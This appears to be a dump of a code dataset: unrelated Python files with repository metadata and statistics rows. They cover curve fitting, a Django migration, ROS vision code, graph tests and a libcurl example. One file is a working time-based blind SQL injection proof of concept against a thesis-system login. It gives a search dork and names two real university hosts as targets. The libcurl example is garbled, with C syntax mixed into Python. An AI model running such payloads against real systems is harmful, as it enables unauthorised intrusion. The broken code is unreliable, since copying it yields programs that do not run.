| 34.742268 | 98 | 0.694659 | 395 | 3,370 | 5.605063 | 0.235443 | 0.072267 | 0.03523 | 0.04065 | 0.33785 | 0.278681 | 0.195122 | 0.195122 | 0.129178 | 0.129178 | 0 | 0.000762 | 0.221068 | 3,370 | 96 | 99 | 35.104167 | 0.842667 | 0.028487 | 0 | 0.12987 | 0 | 0 | 0.054401 | 0.007029 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038961 | false | 0.090909 | 0.155844 | 0.025974 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7878f45b36afa40f0d3868d56e6815cb872b5fa0 | 713 | py | Python | docs/index-7.py | farisachugthai/rtdpy | ac5cd7100d4b8d256021acf4a358bd5c2c4c58ce | [
"MIT"
] | 5 | 2019-12-28T19:53:57.000Z | 2021-09-14T19:59:25.000Z | docs/index-7.py | farisachugthai/rtdpy | ac5cd7100d4b8d256021acf4a358bd5c2c4c58ce | [
"MIT"
] | 3 | 2019-08-19T11:29:01.000Z | 2020-11-10T21:09:41.000Z | docs/index-7.py | farisachugthai/rtdpy | ac5cd7100d4b8d256021acf4a358bd5c2c4c58ce | [
"MIT"
] | 5 | 2019-03-19T08:35:15.000Z | 2020-11-06T20:23:32.000Z | from scipy import optimize
# Generate noisy data from NCSTR system with tau=10 and n=2
a = rtdpy.Ncstr(tau=10, n=2, dt=1, time_end=50)
xdata = a.time
noisefactor = 0.01
ydata = a.exitage \
+ (noisefactor * (np.random.rand(a.time.size) - 0.5))
def f(xdata, tau, n):
a = rtdpy.Ncstr(tau=tau, n=n, dt=1, time_end=50)
return a.exitage
# Give initial guess of tau=5 and n=4
popt, pcov = optimize.curve_fit(f, xdata, ydata, p0=[5, 4],
bounds=(0, np.inf))
plt.plot(xdata, ydata, label='Impulse Experiment')
b = rtdpy.Ncstr(tau=popt[0], n=popt[1], dt=1, time_end=50)
plt.plot(xdata, b.exitage, label='RTD Fit')
plt.title(f'tau={popt[0]: .2f}, n={popt[1]: .2f}')
plt.legend() | 33.952381 | 59 | 0.635344 | 132 | 713 | 3.401515 | 0.439394 | 0.066815 | 0.08686 | 0.066815 | 0.080178 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055077 | 0.185133 | 713 | 21 | 60 | 33.952381 | 0.717728 | 0.130435 | 0 | 0 | 1 | 0 | 0.098706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
787d74e97c95f1df67c3e62879aee9f69a021e02 | 1,653 | py | Python | Bugscan_exploits-master/exp_list/exp-2405.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-2405.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-2405.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!usr/bin/env python
# *-* coding:utf-8 *-*
'''
name: TRS学位论文系统papercon处SQL注入
author: yichin
refer: http://www.wooyun.org/bugs/wooyun-2010-0124453
description:
paper/submit1.jsp POST
stacked queries; AND/OR time-based blind
google dork: intitle:"学位论文服务系统"
'''
import time
def assign(service, arg):
if service == 'trs_lunwen':
return True, arg
def audit(arg):
url = arg + 'papercon'
delay_0 = 'action=login&r_code=%D1%A7%BA%C5%B2%BB%C4%DC%CE%AA%BF%D5&r_password=%C3%DC%C2%EB%B2%BB%C4%DC%CE%AA%BF%D5&code=test%27;waitfor%20delay%270:0:0%27--&password=dsdfaf'
delay_5 = 'action=login&r_code=%D1%A7%BA%C5%B2%BB%C4%DC%CE%AA%BF%D5&r_password=%C3%DC%C2%EB%B2%BB%C4%DC%CE%AA%BF%D5&code=test%27;waitfor%20delay%270:0:5%27--&password=dsdfaf'
code, head, res, err, _ = curl.curl2(arg + 'papercon') #这句好像并没有什么用,然而加上这句能提高准确率
content_type = 'Content-Type: application/x-www-form-urlencoded'
t1 = time.time()
code, head, res, err, _ = curl.curl2(url, post=delay_0, header=content_type)
#print code, head
if code >= 400:
return False
t2 = time.time()
code, head, res, err, _ = curl.curl2(url, post=delay_5, header=content_type)
if code >= 400:
return False
t3 = time.time()
#debug("t0:" + str(t2-t1) + " t5:" + str(t3-t2))
if(t1 + t3 - 2*t2) > 3:
security_hole("SQL Injection: " + url + " POST:" +delay_5)
if __name__ == '__main__':
from dummy import *
audit(assign('trs_lunwen','http://epaper.lib.bnu.edu.cn:8080/')[1])
audit(assign('trs_lunwen','http://thesis.lib.tsinghua.edu.cn:8001/')[1]) | 38.44186 | 179 | 0.630369 | 261 | 1,653 | 3.888889 | 0.45977 | 0.015764 | 0.023645 | 0.031527 | 0.393103 | 0.306404 | 0.283744 | 0.283744 | 0.283744 | 0.283744 | 0 | 0.071001 | 0.190563 | 1,653 | 43 | 180 | 38.44186 | 0.687593 | 0.206897 | 0 | 0.16 | 0 | 0.08 | 0.41256 | 0.283784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0.08 | 0.08 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
787e44f31c1c1961203ac8ac66cfb4c727e970b2 | 519 | py | Python | migrations/0007_doubleentry_account.py | PyUnchained/books | 656d375765300accb1767a8ab1bf4b96c884539f | [
"MIT"
] | null | null | null | migrations/0007_doubleentry_account.py | PyUnchained/books | 656d375765300accb1767a8ab1bf4b96c884539f | [
"MIT"
] | 14 | 2019-10-23T00:01:18.000Z | 2022-03-11T23:38:52.000Z | migrations/0007_doubleentry_account.py | PyUnchained/books | 656d375765300accb1767a8ab1bf4b96c884539f | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2020-01-24 00:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('books', '0006_auto_20200124_0048'),
]
operations = [
migrations.AddField(
model_name='doubleentry',
name='account',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='books.Account'),
preserve_default=False,
),
]
| 24.714286 | 112 | 0.637765 | 59 | 519 | 5.508475 | 0.677966 | 0.073846 | 0.086154 | 0.135385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081841 | 0.246628 | 519 | 20 | 113 | 25.95 | 0.749361 | 0.086705 | 0 | 0 | 1 | 0 | 0.125 | 0.048729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7883b1c92ae0cd35356f8bfc3d8f7d8485f000d8 | 687 | py | Python | tests/test-cli.py | zondo/pypkg | edbd2b1d8aab1c2c0de219ac74c16688939591b9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test-cli.py | zondo/pypkg | edbd2b1d8aab1c2c0de219ac74c16688939591b9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test-cli.py | zondo/pypkg | edbd2b1d8aab1c2c0de219ac74c16688939591b9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # TODO: update or remove this file
from pytest import raises
from pypkg import cli
def test_main(capsys):
cli.main([])
captured = capsys.readouterr()
assert "write me" in captured.err
def test_usage(capsys):
with raises(SystemExit):
cli.main(["-h"])
captured = capsys.readouterr()
assert "Usage:" in captured.out
def test_error():
with raises(SystemExit, match="input file not found"):
cli.main(["nosuchfile"])
def test_exception(mocker):
mocker.patch("pypkg.cli.run", side_effect=NotImplementedError)
with raises(SystemExit):
cli.main([])
with raises(NotImplementedError):
cli.main(["--trace"])
| 20.818182 | 66 | 0.656477 | 84 | 687 | 5.309524 | 0.5 | 0.078475 | 0.134529 | 0.134529 | 0.121076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215429 | 687 | 32 | 67 | 21.46875 | 0.827458 | 0.046579 | 0 | 0.3 | 0 | 0 | 0.101072 | 0 | 0 | 0 | 0 | 0.03125 | 0.1 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7884640c82209137373642e0fa1bd092ed891be6 | 7,284 | py | Python | examples/_todo/http2-upload.py | karpierz/libcurl | 531bd28ab32fb07c152e5b5ca4bd4dbde059b9a8 | [
"Zlib"
] | null | null | null | examples/_todo/http2-upload.py | karpierz/libcurl | 531bd28ab32fb07c152e5b5ca4bd4dbde059b9a8 | [
"Zlib"
] | null | null | null | examples/_todo/http2-upload.py | karpierz/libcurl | 531bd28ab32fb07c152e5b5ca4bd4dbde059b9a8 | [
"Zlib"
] | null | null | null | #***************************************************************************
# _ _ ____ _
# Project ___| | | | _ \| |
# / __| | | | |_) | |
# | (__| |_| | _ <| |___
# \___|\___/|_| \_\_____|
#
# Copyright (C) 1998 - 2021, Daniel Stenberg, <daniel@haxx.se>, et al.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://curl.se/docs/copyright.html.
#
# You may opt to use, copy, modify, merge, publish, distribute and/or sell
# copies of the Software, and permit persons to whom the Software is
# furnished to do so, under the terms of the COPYING file.
#
# This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
# KIND, either express or implied.
#
#***************************************************************************
"""
Multiplexed HTTP/2 uploads over a single connection
"""
import sys
import ctypes as ct
import libcurl as lcurl
#include <curl/mprintf.h>
from curltestutils import * # noqa
from debug import dump
NUM_HANDLES = 1000
struct input {
FILE *in;
size_t bytes_read; # count up
CURL *hnd;
int num;
};
@lcurl.read_callback
def read_function(ptr, size, nmemb, stream):
struct input *i = stream;
size_t retcode = fread(ptr, size, nmemb, i->in);
i->bytes_read += retcode;
return retcode;
def debug_output(info_type, num: int, stream, data, size: int, no_hex: bool):
if info_type == lcurl.CURLINFO_TEXT:
char timebuf[60];
static time_t epoch_offset;
static int known_offset;
struct timeval tv;
time_t secs;
struct tm *now;
gettimeofday(&tv, NULL);
if(!known_offset) {
epoch_offset = time(NULL) - tv.tv_sec;
known_offset = 1;
}
secs = epoch_offset + tv.tv_sec;
now = localtime(&secs); # not thread safe but we do not care
curl_msnprintf(timebuf, sizeof(timebuf), "%02d:%02d:%02d.%06ld",
now->tm_hour, now->tm_min, now->tm_sec, (long)tv.tv_usec);
if num is None:
print("%s Info: %s" %
(timebuf, bytes(data[:size]).decode("utf-8")), end="",
file=stream)
else:
print("%s [%d] Info: %s" %
(timebuf, num, bytes(data[:size]).decode("utf-8")), end="",
file=stream)
else:
if info_type == lcurl.CURLINFO_HEADER_OUT: text = "=> Send header"
elif info_type == lcurl.CURLINFO_DATA_OUT: text = "=> Send data"
elif info_type == lcurl.CURLINFO_SSL_DATA_OUT: text = "=> Send SSL data"
elif info_type == lcurl.CURLINFO_HEADER_IN: text = "<= Recv header"
elif info_type == lcurl.CURLINFO_DATA_IN: text = "<= Recv data"
elif info_type == lcurl.CURLINFO_SSL_DATA_IN: text = "<= Recv SSL data"
else: return 0 # in case a new one is introduced to shock us
dump(text, num, stream, data, size, no_hex)
@lcurl.debug_callback
def debug_function(curl, info_type, data, size, userptr):
struct input *i = (struct input *)userptr;
num = i->num;
no_hex = True
debug_output(info_type, num, sys.stderr, data, size, no_hex)
return 0
static void setup(struct input *i, int num, const char *upload):
FILE *out;
char url[256];
char filename[128];
struct stat file_info;
curl_off_t uploadsize;
CURL *hnd;
hnd = i->hnd = lcurl.easy_init()
i->num = num;
curl_msnprintf(filename, 128, "dl-%d", num);
out = fopen(filename, "wb");
if(!out) {
fprintf(stderr, "error: could not open file %s for writing: %s\n", upload,
strerror(errno));
exit(1);
}
curl_msnprintf(url, 256, "https://localhost:8443/upload-%d", num);
# get the file size of the local file
if(stat(upload, &file_info)) {
fprintf(stderr, "error: could not stat file %s: %s\n", upload,
strerror(errno));
exit(1);
}
uploadsize = file_info.st_size;
i->in = fopen(upload, "rb");
if(!i->in) {
fprintf(stderr, "error: could not open file %s for reading: %s\n", upload,
strerror(errno));
exit(1);
}
# write to this file
curl_easy_setopt(hnd, CURLOPT_WRITEDATA, out);
# we want to use our own read function
lcurl.easy_setopt(hnd, lcurl.CURLOPT_READFUNCTION, read_function)
# read from this file
curl_easy_setopt(hnd, CURLOPT_READDATA, i);
# provide the size of the upload
curl_easy_setopt(hnd, CURLOPT_INFILESIZE_LARGE, uploadsize);
# send in the URL to store the upload as
curl_easy_setopt(hnd, CURLOPT_URL, url);
# upload please
lcurl.easy_setopt(hnd, lcurl.CURLOPT_UPLOAD, 1)
# please be verbose
lcurl.easy_setopt(hnd, lcurl.CURLOPT_VERBOSE, 1)
lcurl.easy_setopt(hnd, lcurl.CURLOPT_DEBUGFUNCTION, debug_function)
curl_easy_setopt(hnd, CURLOPT_DEBUGDATA, i);
# HTTP/2 please
curl_easy_setopt(hnd, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_2_0);
# we use a self-signed test server, skip verification during debugging
lcurl.easy_setopt(hnd, lcurl.CURLOPT_SSL_VERIFYPEER, 0)
lcurl.easy_setopt(hnd, lcurl.CURLOPT_SSL_VERIFYHOST, 0)
if lcurl.CURLPIPE_MULTIPLEX > 0:
# wait for pipe connection to confirm
lcurl.easy_setopt(hnd, lcurl.CURLOPT_PIPEWAIT, 1)
/*
* Upload all files over HTTP/2, using the same physical connection!
*/
int main(int argc, char **argv)
struct input trans[NUM_HANDLES];
CURLM *multi_handle;
const char *filename = "index.html";
int num_transfers;
if len(argv) >= 1:
# if given a number, do that many transfers
num_transfers = int(argv[0])
if (!num_transfers || (num_transfers > NUM_HANDLES)):
num_transfers = 3 # a suitable low default
if len(argv) >= 2:
# if given a file name, upload this!
filename = argv[1]
else:
num_transfers = 3 # suitable default
# init a multi stack
multi_handle = lcurl.multi_init()
for i in range(num_transfers):
setup(&trans[i], i, filename);
# add the individual transfer
lcurl.multi_add_handle(multi_handle, trans[i].hnd)
curl_multi_setopt(multi_handle, CURLMOPT_PIPELINING, lcurl.CURLPIPE_MULTIPLEX)
# We do HTTP/2 so let's stick to one connection per host
lcurl.multi_setopt(multi_handle, lcurl.CURLMOPT_MAX_HOST_CONNECTIONS, 1)
still_running = ct.c_int(1) # keep number of running handles
while still_running.value:
mc: lcurl.CURLMcode = lcurl.multi_perform(multi_handle,
ct.byref(still_running))
if still_running.value:
# wait for activity, timeout or "nothing"
mc = lcurl.multi_poll(multi_handle, None, 0, 1000, None)
if mc:
break;
lcurl.multi_cleanup(multi_handle)
for i in range(num_transfers):
lcurl.multi_remove_handle(multi_handle, trans[i].hnd)
lcurl.easy_cleanup(trans[i].hnd)
return 0
sys.exit(main())
| 31.128205 | 82 | 0.605711 | 965 | 7,284 | 4.38342 | 0.312953 | 0.030733 | 0.039953 | 0.034752 | 0.238061 | 0.185106 | 0.119622 | 0.053901 | 0.036879 | 0.018913 | 0 | 0.013503 | 0.267985 | 7,284 | 233 | 83 | 31.261803 | 0.77982 | 0.233251 | 0 | 0.137681 | 0 | 0 | 0.058577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036232 | null | null | 0.057971 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7885663aa4d13fc0c192951f418e5a31c44b6f75 | 669 | py | Python | tasks.py | joeblackwaslike/pyramid_bootstrap | fc2ee51f9d2d3853a00e44d92c4635d61b638671 | [
"BSD-3-Clause"
] | 1 | 2018-10-03T14:28:54.000Z | 2018-10-03T14:28:54.000Z | tasks.py | joeblackwaslike/pyramid_bootstrap | fc2ee51f9d2d3853a00e44d92c4635d61b638671 | [
"BSD-3-Clause"
] | 2 | 2018-11-17T06:39:30.000Z | 2018-11-17T07:00:58.000Z | tasks.py | joeblackwaslike/pyramid_bootstrap | fc2ee51f9d2d3853a00e44d92c4635d61b638671 | [
"BSD-3-Clause"
] | null | null | null | from invoke import task
@task
def test(ctx):
ctx.run('pytest --cov tests')
@task
def install(ctx):
ctx.run('pip3 install -e ".[testing]"')
@task
def check(ctx):
ctx.run('pyroma .')
ctx.run('pylint pyramid_bootstrap')
ctx.run('pycodestyle')
@task
def clean(ctx):
ctx.run('rm -rf build dist')
@task(pre=[clean])
def build(ctx):
ctx.run('python3 setup.py sdist bdist_wheel')
@task
def upload(ctx, environment='production'):
if environment == 'production':
server = 'pypi'
elif environment == 'test':
server = 'test'
ctx.run(
'twine upload -r {} --sign --identity E23F8CA8 dist/*'.format(server))
| 17.153846 | 78 | 0.620329 | 89 | 669 | 4.640449 | 0.516854 | 0.116223 | 0.108959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011385 | 0.212257 | 669 | 38 | 79 | 17.605263 | 0.772296 | 0 | 0 | 0.192308 | 0 | 0 | 0.334828 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.038462 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
788bc7f4dda393bb2e1b1e58a66b9417d93958ac | 6,569 | py | Python | Autonomous_Control/Image_Processing/3_Coordinate_Transformation.py | tatsujin16/Intellectual_Robot_Contest_2019 | 2dfdcb11ecea991dbbf053f8a71dd7e0838c4626 | [
"BSD-3-Clause"
] | null | null | null | Autonomous_Control/Image_Processing/3_Coordinate_Transformation.py | tatsujin16/Intellectual_Robot_Contest_2019 | 2dfdcb11ecea991dbbf053f8a71dd7e0838c4626 | [
"BSD-3-Clause"
] | 1 | 2019-02-02T12:06:22.000Z | 2019-02-02T12:06:22.000Z | Autonomous_Control/Image_Processing/3_Coordinate_Transformation.py | tatsujin16/Intellectual_Robot_Contest_2019 | 2dfdcb11ecea991dbbf053f8a71dd7e0838c4626 | [
"BSD-3-Clause"
] | 1 | 2022-03-19T07:37:41.000Z | 2022-03-19T07:37:41.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import cv2
import math
import numpy as np
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from geometry_msgs.msg import Twist
class first(object):
def __init__(self):
#sub
self._sub_tag0 = rospy.Subscriber('/tag0_info', Twist, self.callback_tag0)
self._sub_tag1 = rospy.Subscriber('/tag1_info', Twist, self.callback_tag1)
self._cv_image_sub = rospy.Subscriber('cv_image', Image, self.callback, 'img')
self._blue_sub = rospy.Subscriber('blue_image', Image, self.callback, 'blue')
self._red_sub = rospy.Subscriber('red_image',Image, self.callback, 'red')
self._yellow_sub = rospy.Subscriber('yellow_image', Image, self.callback,'yellow')
self._bridge = CvBridge()
#pub
self._cv_image2_pub = rospy.Publisher('cv_image2', Image, queue_size=1)
self._pub_redxy = rospy.Publisher('/red_xy', Twist, queue_size=1)
self._pub_bluexy = rospy.Publisher('/blue_xy', Twist, queue_size=1)
self._pub_yellowxy = rospy.Publisher('/yellow_xy', Twist, queue_size=1)
self._cam_posi = np.zeros(3, dtype = 'float64')
self._angle_r = np.zeros(3, dtype = 'float64')
self._local_tag1 = np.zeros(3, dtype = 'float64')
self._tag1_angle_r = np.zeros(3, dtype = 'float64')
self._vacuum_posi = np.zeros(1, dtype= 'float64')
def callback_tag0(self, message):
self._cam_posi[0] = message.linear.x
self._cam_posi[1] = message.linear.y
self._cam_posi[2] = message.linear.z
self._angle_r[0] = message.angular.x
self._angle_r[2] = message.angular.z
def callback_tag1(self, message1):
self._local_tag1[0] = message1.linear.x
self._local_tag1[1] = message1.linear.y
self._local_tag1[2] = message1.linear.z
self._tag1_angle_r[2] = message1.angular.z
self._vacuum_posi[0] = self._local_tag1[1] - 0.35
def callback(self, data, name):
global flag, FLAG, cv_image1, Mask_color
if(name == 'img'):
cv_image1 = self._bridge.imgmsg_to_cv2(data, 'bgr8')
flag = 1
elif(name == 'red' or name == 'blue' or name == 'yellow'):
Mask_color = self._bridge.imgmsg_to_cv2(data, 'mono8')
FLAG = 1
if(flag == 1 and FLAG == 1):
cv_image2 = self.get_Contours(Mask_color, cv_image1, name)
self._cv_image2_pub.publish(self._bridge.cv2_to_imgmsg(cv_image2, 'bgr8'))
def _Squaring(self, x, y):
Shaded = np.sqrt(x*x + y*y)
return Shaded
def get_Contours(self, mask_color, cv_image, color):
global count
count = 0
imaEdge, contours, hierarchy = cv2.findContours(mask_color,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
if(len(contours) == 0):
if(color == 'red'):
red_xy = Twist()
red_xy.linear.x = 0
red_xy.linear.y = 0
self._pub_redxy.publish(red_xy)
print "4"
elif(color == 'blue'):
blue_xy = Twist()
blue_xy.linear.x = 0
blue_xy.linear.y = 0
self._pub_bluexy.publish(blue_xy)
print "5"
elif(color == 'yellow'):
yellow_xy = Twist()
yellow_xy.linear.x = 0
yellow_xy.linear.y = 0
self._pub_yellowxy.publish(yellow_xy)
print "6"
for kazu in range(len(contours)):
cnt = contours[kazu]
circularity, AREA, Radius = self.Circul_Level(cnt)
Radius = int(Radius)
if(circularity >= 0.80 and AREA >= 200):
x,y,w,h = cv2.boundingRect(cnt)
kari_center_x = x + Radius
kari_center_y = y + Radius
center_x = (kari_center_x - (cv_image.shape[1]/2))
center_y = (kari_center_y - (cv_image.shape[0]/2))*(-1)
cv_image = cv2.rectangle(cv_image,(x,y),(x+w,y+h), (0,255,0),2)
cv_image = cv2.circle(cv_image,(kari_center_x,kari_center_y),2,(0,255,0),-1)
a,b = self.Position_estimation(center_x, center_y)
AA,BB = self.Transform(a,b)
if(color == 'red'):
# print "red[%d] = (%lf,%lf)" %(kazu+1, AA, BB)
vacuum_dis = self._Squaring(AA, BB)
red_xy = Twist()
red_xy.linear.x = round(AA,2)
red_xy.linear.y = round(BB,2)
red_xy.angular.z = round(vacuum_dis,2)
self._pub_redxy.publish(red_xy)
count = count + 1
elif(color == 'blue'):
# print "blue[%d] = (%lf,%lf)" %(kazu+1, AA, BB)
vacuum_dis = self._Squaring(AA, BB)
blue_xy = Twist()
blue_xy.linear.x = round(AA,2)
blue_xy.linear.y = round(BB,2)
blue_xy.angular.z = round(vacuum_dis,2)
self._pub_bluexy.publish(blue_xy)
count = count + 1
elif(color == 'yellow'):
# print "yellow[%d] = (%lf,%lf)" %(kazu+1, AA, BB)
vacuum_dis = self._Squaring(AA, BB)
yellow_xy = Twist()
yellow_xy.linear.x = round(AA,2)
yellow_xy.linear.y = round(BB,2)
yellow_xy.angular.z = round(vacuum_dis,2)
self._pub_yellowxy.publish(yellow_xy)
count = count + 1
print "count = %d" %(count)
if(count == 0 and color == 'red'):
red_xy = Twist()
red_xy.linear.x = 0
red_xy.linear.y = 0
self._pub_redxy.publish(red_xy)
if(count == 0 and color == 'blue'):
blue_xy = Twist()
blue_xy.linear.x = 0
blue_xy.linear.y = 0
self._pub_bluexy.publish(blue_xy)
if(count == 0 and color == 'yellow'):
yellow_xy = Twist()
yellow_xy.linear.x = 0
yellow_xy.linear.y = 0
self._pub_yellowxy.publish(yellow_xy)
return cv_image
def Circul_Level(self, CNT):
area = cv2.contourArea(CNT)
length = cv2.arcLength(CNT, True)
Circularity = 4.0*np.pi*area/(length*length)
radius = np.sqrt(area/np.pi)
if(radius<0):
radius*(-1)
return Circularity, area, radius
def Position_estimation(self, C_X, C_Y):
fy = 968.412572
h = self._cam_posi[2] + 0.041
shita = self._angle_r[0]
C_X1 = abs(C_X)
C_Y1 = abs(C_Y)
delta_shita = math.atan2(C_Y1, fy)
if(C_Y <= 0.0):
a = shita + delta_shita
elif(C_Y > 0.0):
a = shita - delta_shita
yt = h / np.tan(a)
f_dash = np.sqrt(fy*fy + C_Y1*C_Y1)
xt = (C_X1*np.sqrt(yt*yt + h*h)) / f_dash
if(C_X < 0.0):
xt = xt*(-1)
return xt, yt
#回転行列
def make_rot_mat(self, angle, c_x, c_y):
rot_matrix = [[np.cos(angle),np.sin(angle),c_x],[(-1)*np.sin(angle),np.cos(angle),c_y]]
rot_matrix = np.matrix(rot_matrix)
return rot_matrix
def Transform(self, ball_x, ball_y):
angle = (-1)*(self._tag1_angle_r[2])
c_x = self._local_tag1[0]
c_y = self._vacuum_posi[0]
from_camera_to_ball = np.array([ball_x, ball_y,1])
rot_mat = self.make_rot_mat(angle, c_x, c_y)
rot_xy = np.dot(rot_mat, from_camera_to_ball.reshape(3,1))
para_rot_x, para_rot_y = rot_xy[0, 0], rot_xy[1, 0]
return para_rot_x ,para_rot_y
if __name__ == '__main__':
rospy.init_node('senbetu')
first = first()
try:
flag = 0
FLAG = 0
count = 0
rospy.spin()
except KeyboardInterrupt:
pass
| 32.519802 | 99 | 0.662506 | 1,099 | 6,569 | 3.704277 | 0.165605 | 0.035372 | 0.019897 | 0.014738 | 0.329403 | 0.309998 | 0.218865 | 0.188897 | 0.164333 | 0.140752 | 0 | 0.035375 | 0.182372 | 6,569 | 201 | 100 | 32.681592 | 0.722584 | 0.031664 | 0 | 0.248588 | 0 | 0 | 0.037777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.00565 | 0.039548 | null | null | 0.022599 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
788d68479fe04280827b76769dc0786af1cc14a6 | 2,674 | py | Python | dev/examples/tungraph.py | Cam2337/snap-python | 0bf722b461f8b5aae3ecb2757313521e9e9e76f1 | [
"BSD-3-Clause"
] | 242 | 2015-01-01T08:40:28.000Z | 2022-03-18T05:22:09.000Z | dev/examples/tungraph.py | Cam2337/snap-python | 0bf722b461f8b5aae3ecb2757313521e9e9e76f1 | [
"BSD-3-Clause"
] | 99 | 2015-01-24T07:55:27.000Z | 2021-10-30T18:20:13.000Z | dev/examples/tungraph.py | Cam2337/snap-python | 0bf722b461f8b5aae3ecb2757313521e9e9e76f1 | [
"BSD-3-Clause"
] | 105 | 2015-03-03T06:45:17.000Z | 2022-02-24T15:52:40.000Z | import random
import sys
sys.path.append("../swig-r")
import snap
def PrintGStats(s, Graph):
'''
Print graph statistics
'''
print "graph %s, nodes %d, edges %d, empty %s" % (
s, Graph.GetNodes(), Graph.GetEdges(),
"yes" if Graph.Empty() else "no")
def DefaultConstructor():
'''
Test the default constructor
'''
Graph = snap.TUNGraph()
PrintGStats("DefaultConstructor:Graph",Graph)
def ManipulateNodesEdges():
'''
Test node, edge creation
'''
NNodes = 10000
NEdges = 100000
FName = "test.graph"
Graph = snap.TUNGraph()
t = Graph.Empty()
# create the nodes
for i in range(0, NNodes):
Graph.AddNode(i)
t = Graph.Empty()
n = Graph.GetNodes()
# create random edges
NCount = NEdges
while NCount > 0:
x = int(random.random() * NNodes)
y = int(random.random() * NNodes)
# skip the loops in this test
if x != y and not Graph.IsEdge(x,y):
n = Graph.AddEdge(x, y)
NCount -= 1
PrintGStats("ManipulateNodesEdges:Graph1",Graph)
# get all the nodes
NCount = 0
NI = Graph.BegNI()
while NI < Graph.EndNI():
NCount += 1
NI.Next()
# get all the edges for all the nodes
ECount1 = 0;
NI = Graph.BegNI()
while NI < Graph.EndNI():
ECount1 += NI.GetOutDeg()
NI.Next()
ECount1 = ECount1 / 2
# get all the edges directly
ECount2 = 0;
EI = Graph.BegEI()
while EI < Graph.EndEI():
ECount2 += 1
EI.Next()
print "graph ManipulateNodesEdges:Graph2, nodes %d, edges1 %d, edges2 %d" % (
NCount, ECount1, ECount2)
# assignment
Graph1 = Graph;
